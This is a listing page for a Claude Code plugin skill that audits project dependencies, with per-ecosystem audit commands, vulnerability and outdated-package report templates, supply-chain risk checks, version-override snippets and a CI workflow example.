Stats
Actions
Tags
From memstack
Scans project dependencies for vulnerabilities, outdated packages, abandoned libraries, and supply chain risks. Auto-detects ecosystem and generates upgrade plan.
How this skill is triggered — by the user, by Claude, or both
Slash command
/memstack:dependency-auditThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
*Scan project dependencies for vulnerabilities, outdated packages, abandoned libraries, and supply chain risks with a prioritized upgrade plan.*
Scan project dependencies for vulnerabilities, outdated packages, abandoned libraries, and supply chain risks with a prioritized upgrade plan.
When this skill activates, output:
🔒 Dependency Audit — Scanning your dependency tree...
| Context | Status |
|---|---|
| User says "dependency audit", "npm audit", "scan dependencies" | ACTIVE |
| User wants to check for vulnerable or outdated packages | ACTIVE |
| User mentions CVEs, supply chain security, or abandoned packages | ACTIVE |
| User wants OWASP web app security (not just dependencies) | DORMANT — see owasp-top10 |
| User wants secrets scanning (not package vulnerabilities) | DORMANT — see secrets-scanner |
| User wants general code review | DORMANT — see code-reviewer |
Identify the package ecosystem from project files:
| File Found | Ecosystem | Audit Command | Outdated Command |
|---|---|---|---|
package.json | npm/Node.js | npm audit --json | npm outdated --json |
package-lock.json | npm (locked) | npm audit --json | npm outdated --json |
yarn.lock | Yarn | yarn audit --json | yarn outdated --json |
pnpm-lock.yaml | pnpm | pnpm audit --json | pnpm outdated --json |
requirements.txt | pip/Python | pip audit --format=json | pip list --outdated --format=json |
Pipfile.lock | Pipenv | pipenv check --output json | pipenv update --dry-run |
pyproject.toml | Poetry/Python | pip audit --format=json | poetry show --outdated |
Cargo.toml | Rust/Cargo | cargo audit --json | cargo outdated --format json |
go.mod | Go | govulncheck ./... | go list -u -m all |
Gemfile.lock | Ruby/Bundler | bundle audit check --format json | bundle outdated |
If multiple ecosystems detected, audit all of them. Report which ecosystem each finding belongs to.
Execute the appropriate audit command and parse results into a unified format:
── VULNERABILITY SCAN ─────────────────────
CVE-2024-XXXXX 🔴 CRITICAL
Package: [name]@[version]
Dependency: Direct / Transitive (via [parent])
Fixed in: [version]
Description: [brief description]
CVSS Score: [score]
Exploitability: [network/local] [complexity]
CVE-2024-YYYYY 🟡 HIGH
Package: [name]@[version]
Dependency: Transitive (via [parent] → [grandparent])
Fixed in: [version]
Description: [brief description]
CVSS Score: [score]
Exploitability: [network/local] [complexity]
Severity classification:
| Severity | CVSS Score | Icon | Action |
|---|---|---|---|
| Critical | 9.0 - 10.0 | 🔴 | Fix immediately — potential active exploitation |
| High | 7.0 - 8.9 | 🟡 | Fix within 1 week — significant risk |
| Medium | 4.0 - 6.9 | 🟠 | Fix within 1 month — moderate risk |
| Low | 0.1 - 3.9 | 🔵 | Fix when convenient — minimal risk |
Direct vs transitive priority:
overrides (npm) or resolutions (Yarn)Run the outdated command and categorize results:
── OUTDATED PACKAGES ──────────────────────
Package Current Latest Type Risk
─────────────────────────────────────────────────────
[package-a] 1.2.3 1.2.8 Patch ✅ Safe — bug fixes only
[package-b] 2.1.0 2.4.0 Minor ✅ Safe — new features, backward compatible
[package-c] 3.0.0 4.2.1 Major ⚠️ Breaking — review changelog
[package-d] 1.0.0 1.0.0 Current ✅ Up to date
Version gap classification:
| Gap Type | Risk | Approach |
|---|---|---|
| Patch (1.2.3 → 1.2.8) | Very Low | Update immediately — bug/security fixes |
| Minor (2.1.0 → 2.4.0) | Low | Update in batch — new features, backward compatible |
| Major (3.0.0 → 4.2.1) | Medium-High | Review migration guide, test thoroughly |
| Multiple majors (1.x → 4.x) | High | Dedicate time, may require code changes |
Check each dependency for maintenance status:
── ABANDONED PACKAGE CHECK ────────────────
Package Last Publish Downloads/wk Status
──────────────────────────────────────────────────────
[package-x] 3 years ago 12,000 ⚠️ ABANDONED — find alternative
[package-y] 2.5 years ago 800 🔴 DEAD — replace immediately
[package-z] 6 months ago 250,000 ✅ Active
Abandonment indicators:
For each abandoned package, suggest:
Check for packages with known supply chain risk factors:
| Risk Factor | Detection Method | Severity |
|---|---|---|
| Typosquatting | Package name similar to popular package | High |
| Install scripts | preinstall/postinstall scripts in package.json | Medium |
| Excessive permissions | Package requests network/fs access unexpectedly | Medium |
| Single maintainer | One person controls publishing | Low-Medium |
| Recent ownership transfer | npm ownership changed recently | High |
| Minified source only | No readable source code in package | Medium |
| Unpinned dependencies | Using * or >= in dependency ranges | Medium |
── SUPPLY CHAIN RISKS ─────────────────────
[package-a] ⚠️ Has postinstall script
Script: "postinstall": "node setup.js"
Review: [does it fetch remote code? write to fs? safe build step?]
[package-b] ⚠️ Single maintainer, low download count
Maintainer: [username]
Weekly downloads: [count]
Alternative: [more established package]
Create a prioritized upgrade plan in three tiers:
━━━ TIER 1: IMMEDIATE (This Sprint) ━━━━━━
Critical/High vulnerabilities in direct dependencies.
Patch updates with no breaking changes.
1. [package]@[current] → [target]
Reason: 🔴 CVE-2024-XXXXX (CRITICAL)
Risk: None — patch update
Command: npm install [package]@[target]
2. [package]@[current] → [target]
Reason: 🟡 CVE-2024-YYYYY (HIGH)
Risk: None — minor update
Command: npm install [package]@[target]
━━━ TIER 2: PLANNED (Next 2 Weeks) ━━━━━━━
Medium vulnerabilities, minor version updates,
replacing abandoned packages.
3. [package]@[current] → [target]
Reason: 🟠 CVE-2024-ZZZZZ (MEDIUM) + 8 minor versions behind
Risk: Low — review changelog for deprecations
Command: npm install [package]@[target]
Test: [specific areas to regression test]
4. [package] → [replacement-package]
Reason: ⚠️ Abandoned (last publish: 2 years ago)
Risk: Medium — API differences, migration needed
Migration: [brief migration steps]
━━━ TIER 3: SCHEDULED (Next Quarter) ━━━━━━
Major version upgrades requiring migration effort.
5. [package]@[current] → [target]
Reason: 3 major versions behind, accumulating tech debt
Risk: High — breaking changes in v3 and v4
Migration guide: [URL]
Estimated effort: [hours/days]
Test: [comprehensive regression testing required]
When a transitive dependency can't be fixed by updating the direct parent:
npm (overrides in package.json):
{
"overrides": {
"vulnerable-package": ">=2.0.1"
}
}
Yarn (resolutions in package.json):
{
"resolutions": {
"vulnerable-package": ">=2.0.1"
}
}
pnpm (overrides in package.json):
{
"pnpm": {
"overrides": {
"vulnerable-package": ">=2.0.1"
}
}
}
Pip (constraint file):
# constraints.txt
vulnerable-package>=2.0.1
pip install -c constraints.txt -r requirements.txt
Caution: Overrides can break compatibility. Always test after applying.
Recommend automated dependency scanning in CI:
# GitHub Actions example
name: Dependency Audit
on:
schedule:
- cron: '0 9 * * 1' # Weekly Monday 9 AM
pull_request:
paths:
- 'package.json'
- 'package-lock.json'
jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
- run: npm audit --audit-level=high
- run: npm outdated || true # Don't fail on outdated
Recommended tools for ongoing monitoring:
Present the complete dependency health report:
━━━ DEPENDENCY HEALTH REPORT ━━━━━━━━━━━━━
Project: [name]
Ecosystem: [npm/pip/cargo/etc.]
Scan date: [date]
Total dependencies: [direct] direct, [transitive] transitive
── VULNERABILITY SUMMARY ──────────────────
🔴 Critical: [count]
🟡 High: [count]
🟠 Medium: [count]
🔵 Low: [count]
── VULNERABILITIES ────────────────────────
[detailed CVE list with fix versions]
── OUTDATED PACKAGES ──────────────────────
Patch updates available: [count]
Minor updates available: [count]
Major updates available: [count]
── ABANDONED PACKAGES ─────────────────────
[list with alternatives]
── SUPPLY CHAIN RISKS ─────────────────────
[risk factors found]
── UPGRADE PLAN ───────────────────────────
Tier 1 (Immediate): [count] packages
Tier 2 (Planned): [count] packages
Tier 3 (Scheduled): [count] packages
── COMMANDS ───────────────────────────────
[copy-paste upgrade commands]
── CI RECOMMENDATION ──────────────────────
[automated scanning setup]
── HEALTH SCORE ───────────────────────────
Score: [X/100]
Vulnerabilities: [-points per severity]
Currency: [-points per outdated major]
Maintenance: [-points per abandoned dep]
Supply chain: [-points per risk factor]
Health score calculation:
npx claudepluginhub cwinvestments/memstack --plugin memstackAudits project dependencies from package.json, requirements.txt, go.mod, Gemfile for CVEs, outdated packages, transitive issues, licenses, and supply chain risks. Provides severity assessments, remediation suggestions, and prioritized reports.
Audits dependencies for security, license, outdated, and transitive risk. Outputs findings table, license matrix, priority matrix, health score, and remediation plan.
Audits project dependencies for CVEs, outdated versions, incompatible licenses, and abandoned packages using npm audit, pip-audit, cargo audit, govulncheck, composer audit. Blocks releases on critical/high vulns.